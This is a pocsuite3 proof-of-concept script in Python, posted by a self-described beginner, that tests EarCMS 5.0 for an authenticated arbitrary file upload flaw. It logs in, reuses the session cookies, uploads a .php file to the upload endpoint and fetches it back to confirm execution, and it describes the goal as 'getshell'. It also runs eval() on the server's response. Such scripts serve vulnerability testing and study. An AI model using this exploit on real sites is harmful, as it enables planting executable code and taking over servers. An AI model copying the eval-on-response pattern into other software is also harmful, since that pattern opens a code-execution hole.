EarCMS后台文件上传漏洞,pocsuite3检测脚本,内容为python编写的模拟登录后,通过cookie来上传文件,刚学习python不久,希望可以有更多的学习机会
# coding: utf-8
from urllib import parse as urlparse
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
from urllib.parse import urljoin
class TestPOC(POCBase):#TestPOC最后注册用
vulID = '12763'
version = '5.0'
author = 'marry'
vulDate = '2019-05-13'
createDate = '2019-09-29'
updateDate = '2019-09-29'
references = ['https://xz.aliyun.com/t/5873']
name = 'EarCMS后台文件上传'
appPowerLink = 'http://www.earcms.net/'
appName = 'earcms'
appVersion = '5.0'
vulType = 'file upload'
desc = '''
Front Register Account, Malicious File Upload, getshell
'''
def _verify(self):
def check(url):
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'
}
url_login ='/source/index/ajax.php?ac=login&[email protected]&pwd=xxxx'#替换自己的mail和pwd
url_0 =urljoin(self.url,url_login)#拼接字符串,在类中忘记写self了
res = req.get(url=url_0, headers=headers)
PHPSESSID = res.cookies['PHPSESSID']
in_userid = res.cookies['in_userid']
in_username = res.cookies['in_username']
in_userpassword = res.cookies['in_userpassword']
cookies = {'PHPSESSID': PHPSESSID, 'in_userid': in_userid, 'in_username': in_username,
'in_userpassword': in_userpassword}
path ='/source/pack/upload/index-uplog.php'
url_1 = urljoin(self.url,path)
files = {'app': ('1.php', '123', 'application/octet-stream')}
data = {
"time": "1-1569738560"
}#如果我们需要在上传文件的同时传递一些其它参数,在这浪费了太多时间,一开始没看见time参数,报错没看,把它放在data中
try:
r = req.post(url_1, headers=headers, cookies=cookies, files=files, data=data)
if '1-1569738560' in r.text:
name = eval(r.text)['time']
url_2 = url+ '/data/tmp/' + name + '.php'
respose = req.get(url_2, headers)
if '123' in respose.text:
resmsg = respose.text
else:
resmsg ='no_upload_file'
except Exception as e:
pass
if '123' in resmsg:
return (True, resmsg)
else:
return(False,resmsg)
result ={}
pr = urlparse.urlparse(self.url)
if pr.port: # and pr.port not in ports:
ports = [pr.port]
else:
ports =[80]
for port in ports:
try:
url = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
status,msg = check(url)
if status:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
result['VerifyInfo']['payload'] = msg
except:
pass
return self.parse_output(result)
def _attack(self):#攻击代码
return self._verify()#没有攻击模式,只有验证模式
def parse_output(self, result):#标准的输入模式
output = Output(self)
if result:
output.success(result)
else:
output.fail('not vulnerability')
return output
register(TestPOC)